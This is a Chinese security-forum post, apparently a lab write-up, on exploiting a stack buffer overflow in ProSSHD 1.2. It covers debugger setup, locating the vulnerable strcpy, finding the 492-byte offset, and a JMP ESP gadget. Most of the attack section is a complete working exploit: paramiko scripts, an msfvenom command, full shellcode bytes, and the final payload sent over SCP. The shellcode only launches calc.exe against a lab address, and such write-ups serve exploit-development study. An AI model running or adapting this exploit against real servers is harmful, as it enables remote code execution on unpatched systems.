-
-
[分享]ProSSHD 1.2 20090726 - Remote Buffer Overflow
-
发表于: 2021-6-4 22:04 6312
-
前言
此软件历史存在的漏洞相信很多朋友已经分析并分享过了,但随着时间的迁移,系统升级,相关工具跟不上脚步,所以此文章的核心是把一些环境细节更标准化,比如使用Windbg作为主要调试工具。
环境描述
1 2 3 4 5 6 | 系统: Microsoft Windows [版本 10.0 . 19042.985 ] x64 windbg: 10.0 . 17763.132 (x86),通过winsdksetup下载,版本要对 Python : 2.7 . 1 (r271: 86832 , Nov 27 2010 , 18 : 30 : 46 ) PyKD: 0.2 . 0.29 ProSSHD: 1.2 20090726 sokit:调试网络小工具 |
参考信息:
1 2 | windbg:https: / / go.microsoft.com / fwlink / p / ?LinkID = 2033908 ProSSHD:https: / / www.exploit - db.com / apps / dc04ef8768717e17f322f78316704008 - sshdlabp.exe |
环境部署
1.winsdksetup:下载windbg并配置好mona.
如图:
2.账户设置:
username:test1
password:asdf
如图:
3.配置Windbg监控:windbg -I,注意权限:Admin
4.安装ProSSHD:下载dc04ef8768717e17f322f78316704008,默认安装即可。特别说明在使用过程中出现“0 day”问题,于时间有关,处理方法则是修改系统时间,比如2011.xx.xx,之后就会看到"free 30 day",此时点击“是(Y)”即可:
5.初始化XWP SSH服务:
6.启动“Run as exe”:
7.验证效果 ip: 192.168.233.128, port:22 :
注意:当出现下图错误,强制关闭连接,有可能是时间被同步了,所以重新修改为2011.XX.XX即可。
实验操作
1.漏洞触发脚本:
1 2 3 4 5 6 7 8 9 | import paramiko from scpclient import * import time ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname = '192.168.233.128' , port = 22 , username = 'test1' , password = 'asdf' , key_filename = None ) Write(ssh.get_transport(), "A" * 500 ) ssh.close() |
效果图:
2.从上面测试得出出发漏洞的真正进程为“wsshd.exe”
3.动静态结合分析一下
1.析出关键函数:
401920:真正漏洞事发地,strcpy(Destination, a1);
;
2.看一下“Destination”,“a1”,的大小,问题就突显了:
Destination:512字节
a1:520个字节
3.F10 对比一下是覆盖情况即可,保持简洁。
4.在函数返回指令下断,我们的预期目标出现,到此结束:
POC构建:
1.确定偏移:mona pc 500, offset: 492
1 2 3 4 5 6 7 8 9 10 11 | import paramiko from scpclient import * import time ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname = '192.168.233.128' , port = 22 , username = 'test1' , password = 'asdf' , key_filename = None ) time.sleep( 15 ) # Write(ssh.get_transport(), "A"*500).close() Write(ssh.get_transport(), "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" ).close() ssh.close() |
2.
1.非DEP情况:
1.寻找跳板:mona modules,ASLR->FALSE
mona jmp -r esp -m MSVCR71.dll
跳板地址:0x7c345c30
2.msf生成shellcode:
1 | msfvenom - p windows / exec CMD = calc.exe - b '\x00\x0a' - e x86 / shikata_ga_nai - f py > sc.txt |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | buf = b"" buf + = b "\xbe\xc3\x23\x1d\x88\xdb\xd7\xd9\x74\x24\xf4\x5d\x31" buf + = b "\xc9\xb1\x31\x31\x75\x13\x03\x75\x13\x83\xc5\xc7\xc1" buf + = b "\xe8\x74\x2f\x87\x13\x85\xaf\xe8\x9a\x60\x9e\x28\xf8" buf + = b "\xe1\xb0\x98\x8a\xa4\x3c\x52\xde\x5c\xb7\x16\xf7\x53" buf + = b "\x70\x9c\x21\x5d\x81\x8d\x12\xfc\x01\xcc\x46\xde\x38" buf + = b "\x1f\x9b\x1f\x7d\x42\x56\x4d\xd6\x08\xc5\x62\x53\x44" buf + = b "\xd6\x09\x2f\x48\x5e\xed\xe7\x6b\x4f\xa0\x7c\x32\x4f" buf + = b "\x42\x51\x4e\xc6\x5c\xb6\x6b\x90\xd7\x0c\x07\x23\x3e" buf + = b "\x5d\xe8\x88\x7f\x52\x1b\xd0\xb8\x54\xc4\xa7\xb0\xa7" buf + = b "\x79\xb0\x06\xda\xa5\x35\x9d\x7c\x2d\xed\x79\x7d\xe2" buf + = b "\x68\x09\x71\x4f\xfe\x55\x95\x4e\xd3\xed\xa1\xdb\xd2" buf + = b "\x21\x20\x9f\xf0\xe5\x69\x7b\x98\xbc\xd7\x2a\xa5\xdf" buf + = b "\xb8\x93\x03\xab\x54\xc7\x39\xf6\x32\x16\xcf\x8c\x70" buf + = b "\x18\xcf\x8e\x24\x71\xfe\x05\xab\x06\xff\xcf\x88\xf9" buf + = b "\xb5\x52\xb8\x91\x13\x07\xf9\xff\xa3\xfd\x3d\x06\x20" buf + = b "\xf4\xbd\xfd\x38\x7d\xb8\xba\xfe\x6d\xb0\xd3\x6a\x92" buf + = b "\x67\xd3\xbe\xf1\xe6\x47\x22\xd8\x8d\xef\xc1\x24" |
- 填充字节 + jmp esp + shellcode:主要是跳板的运用,多调试就了解,说再多无用,上完整利用代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | import paramiko from scpclient import * import time import struct buf = b"" buf + = b "\xbe\xc3\x23\x1d\x88\xdb\xd7\xd9\x74\x24\xf4\x5d\x31" buf + = b "\xc9\xb1\x31\x31\x75\x13\x03\x75\x13\x83\xc5\xc7\xc1" buf + = b "\xe8\x74\x2f\x87\x13\x85\xaf\xe8\x9a\x60\x9e\x28\xf8" buf + = b "\xe1\xb0\x98\x8a\xa4\x3c\x52\xde\x5c\xb7\x16\xf7\x53" buf + = b "\x70\x9c\x21\x5d\x81\x8d\x12\xfc\x01\xcc\x46\xde\x38" buf + = b "\x1f\x9b\x1f\x7d\x42\x56\x4d\xd6\x08\xc5\x62\x53\x44" buf + = b "\xd6\x09\x2f\x48\x5e\xed\xe7\x6b\x4f\xa0\x7c\x32\x4f" buf + = b "\x42\x51\x4e\xc6\x5c\xb6\x6b\x90\xd7\x0c\x07\x23\x3e" buf + = b "\x5d\xe8\x88\x7f\x52\x1b\xd0\xb8\x54\xc4\xa7\xb0\xa7" buf + = b "\x79\xb0\x06\xda\xa5\x35\x9d\x7c\x2d\xed\x79\x7d\xe2" buf + = b "\x68\x09\x71\x4f\xfe\x55\x95\x4e\xd3\xed\xa1\xdb\xd2" buf + = b "\x21\x20\x9f\xf0\xe5\x69\x7b\x98\xbc\xd7\x2a\xa5\xdf" buf + = b "\xb8\x93\x03\xab\x54\xc7\x39\xf6\x32\x16\xcf\x8c\x70" buf + = b "\x18\xcf\x8e\x24\x71\xfe\x05\xab\x06\xff\xcf\x88\xf9" buf + = b "\xb5\x52\xb8\x91\x13\x07\xf9\xff\xa3\xfd\x3d\x06\x20" buf + = b "\xf4\xbd\xfd\x38\x7d\xb8\xba\xfe\x6d\xb0\xd3\x6a\x92" buf + = b "\x67\xd3\xbe\xf1\xe6\x47\x22\xd8\x8d\xef\xc1\x24" jmp_esp = struct.pack( '<L' , 0x7c345c30 ) ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname = '192.168.233.128' , port = 22 , username = 'test1' , password = 'asdf' , key_filename = None ) time.sleep( 15 ) # Write(ssh.get_transport(), "A"*500).close() #"A"*489+{jmp_esp}+buf # 0x7c345c30 shellcode = "A" * 492 + jmp_esp + "\x90\x90\x90\x90\x90\x90\x90" + buf Write(ssh.get_transport(), shellcode).close() ssh.close() |
总结:
整体来说,还是比较完整的,熟悉基本知识,再接再厉。